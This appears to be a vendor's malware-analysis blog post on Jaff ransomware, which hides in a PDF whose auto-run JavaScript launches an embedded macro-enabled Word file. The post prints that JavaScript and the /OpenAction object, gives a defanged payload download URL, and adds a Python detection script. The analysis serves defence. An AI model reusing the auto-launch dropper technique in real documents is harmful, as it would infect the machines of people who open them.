
Jaff Ransomware Hiding in a PDF document

The challenge for a malware author today has more to do with creativity than a deep technical understanding. There are plenty of good trojan building tools out there to make the job easier. But once the author has a finished creation, the big challenge is how to get the finished product to the victims.

Embedding malware inside a Word document is by now commonplace. Typically this is in the form of a Macro launched by the ‘enable content’ function, also known as the ‘Please Infect My Machine’ feature. Malware authors have taken the next logical step by using a PDF document as the starting point.

A PDF is not only a fixed readable document. It has many more features like drawing and creating forms. Importantly for malware authors, a PDF document can interpret Javascript. Let’s have a look at the malware analysis where the author created a PDF document embedded with JavaScript that creates a Microsoft Word document with an embedded VBScript to execute Jaff Ransomware.

Jaff Ransomware Analysis

After uploading the innocent-looking “nm.pdf” file to the VMRay Analyzer, we got an extremely high VTI (VMRay Threat Identifier) Score: 100/100. To understand why the score is so high we start by looking at the VTI Information.

Figure 1: Jaff Ransomware VTI Score 100/100

The second entry confirms what the blog title already hinted at: “Rename multiple user files.” This is an indicator of an encryption attempt. We are certainly dealing with ransomware.

But how does it work? The PDF document isn’t able to run like an executable. In the VMRay Analyzer Report, we can go back to the overview page and look at the process graph.

Figure 2: Jaff Ransomware Process Graph

This shows us a truly new behavior when opening a PDF document.
First, to open the “nm.pdf” file, the Acrobat Reader process “acrord32.exe” starts and loads the PDF. Then a message pops up and asks whether to open a file named “EQV6A.docm”. This message warns us against opening the file because it could potentially harm our computer.

Figure 3: PDF wants to open a file

This works because the PDF document has an embedded JavaScript which starts when the document is opened.

<<
/Type/Catalog/Pages 9 0 R/Names 13 0 R/OpenAction
<< /S/JavaScript/JS(submarine();) >>
>>

Figure 4: PDF object shows open action

This object says: Start the JavaScript function “submarine()” on the “OpenAction”.

Inside the “submarine()” function is a call to “abc”, a variable that refers to the Acrobat API method “exportDataObject”.

It is called with the parameters cName:“EQV6A.docm” and nLaunch:“2”. An nLaunch value of “2” directs Acrobat to save the file attachment to a temporary file and then ask the operating system to open it. An error will occur if the operating system has no program associated with that file type to open the exported file.

// nLaunch value 2: save the attachment to a temporary file and ask the OS to open it
var dis = 2;
// bracket-notation lookup of the Acrobat API method exportDataObject
var abc = this['exportDataObject'];
// called by the /OpenAction as soon as the document is opened
function submarine() {
	abc({
		cName: "EQV6A.docm", nLaunch: dis
	});
};

Figure 5: The embedded Javascript in the PDF
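As an added defender-side example that is not part of the original analysis or of VMRay’s tooling, the following Python script scans an uncompressed PDF body for exactly the chain described above: an /OpenAction that runs JavaScript, a call to exportDataObject, an nLaunch value resolved through a variable, and the attachment name it targets. The sample PDF skeleton and the function names triage_pdf and verdict are constructed for this illustration.

```python
import re

# Constructed sample (not the real nm.pdf): a minimal, non-renderable PDF skeleton
# that reproduces the object layout described in the analysis.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj
<< /Type/Catalog/Pages 9 0 R/Names 13 0 R/OpenAction << /S/JavaScript/JS(submarine();) >> >>
endobj
14 0 obj
<< /S/JavaScript/JS(var dis = 2;var abc = this['exportDataObject'];function submarine() {abc({cName: "EQV6A.docm", nLaunch: dis});};) >>
endobj
15 0 obj
<< /Type/Filespec/F(EQV6A.docm)/EF << /F 16 0 R >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

RISKY_EXT = (".docm", ".doc", ".xlsm", ".exe", ".js", ".vbs", ".hta")

def triage_pdf(data: bytes) -> dict:
    """Collect indicators of the open-action/exportDataObject chain.
    Limitation: JavaScript inside FlateDecode streams or hex strings, and an
    /OpenAction given as an indirect reference, must be decoded/resolved first."""
    f = {"open_action_js": False, "export_data_object": False,
         "launch_mode": None, "attachments": [], "risky_attachments": []}
    # Auto-run on open: /OpenAction whose action dictionary has /S /JavaScript
    f["open_action_js"] = re.search(rb"/OpenAction\s*<<[^>]*?/S\s*/JavaScript", data) is not None
    # exportDataObject hands an attachment to the OS; the bracket-notation lookup
    # this['exportDataObject'] still contains the literal method name
    f["export_data_object"] = b"exportDataObject" in data
    # nLaunch may be a literal or, as in the sample, a variable (var dis = 2)
    m = re.search(rb"nLaunch\s*:\s*(\w+)", data)
    if m:
        val = m.group(1)
        if not val.isdigit():
            v = re.search(rb"var\s+" + re.escape(val) + rb"\s*=\s*(\d+)", data)
            val = v.group(1) if v else None
        f["launch_mode"] = int(val) if val else None
    # Attachment names from both the JS call (cName) and /Filespec objects
    names = re.findall(rb'cName\s*:\s*"([^"]+)"', data)
    names += re.findall(rb"/Type\s*/Filespec[^>]*?/F\s*\(([^)]+)\)", data)
    f["attachments"] = sorted({n.decode("latin-1") for n in names})
    f["risky_attachments"] = [n for n in f["attachments"] if n.lower().endswith(RISKY_EXT)]
    return f

def verdict(f: dict) -> str:
    """Flag when auto-run script exports and launches (nLaunch 2) a risky attachment."""
    chain = f["open_action_js"] and f["export_data_object"] and f["launch_mode"] == 2
    if chain and f["risky_attachments"]:
        return "suspicious: open-action JavaScript launches " + ", ".join(f["risky_attachments"])
    return "no auto-launch chain found"

if __name__ == "__main__":
    print(verdict(triage_pdf(SAMPLE_PDF)))
```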

In any event, VMRay Analyzer has already decided to open this file, which then starts the Word process “winword.exe” to load the “EQV6A.docm” file.

Figure 6: Word – Social engineering to tempt the user to enable content

From here we can easily guess what happens next. That’s right, a Visual Basic macro starts and downloads an executable from hxxp://babil117.com/f87346b, also logged as the third entry in the VTI Information and shown in the grouped behavior section.

Figure 7: Downloading the executable

After downloading, the Visual Basic macro starts the executable which then generates a new child process “pitupi20.exe” shown in the process graph. This is the most malicious part because after a while “pitupi20.exe” creates text and HTML files with a direct hint as to what can be expected next.

Figure 8: Jaff ransomware decryptor system

“Jaff decryptor system” lives up to its name and gives every encrypted file the suffix “.jaff”.

Figure 9: Suffix “.jaff” on a .jpg file

Conclusion

This analysis showed a very creative malware construction. The malware author created a PDF document with an embedded JavaScript and an embedded Word document.

The PDF document starts the embedded Word document which then starts a Visual Basic macro to download and execute the “jaff decryptor system” (Ransomware). This is the malware equivalent of a Russian Matryoshka doll. But all this creative wrapping does not help it to evade the VMRay Analyzer.
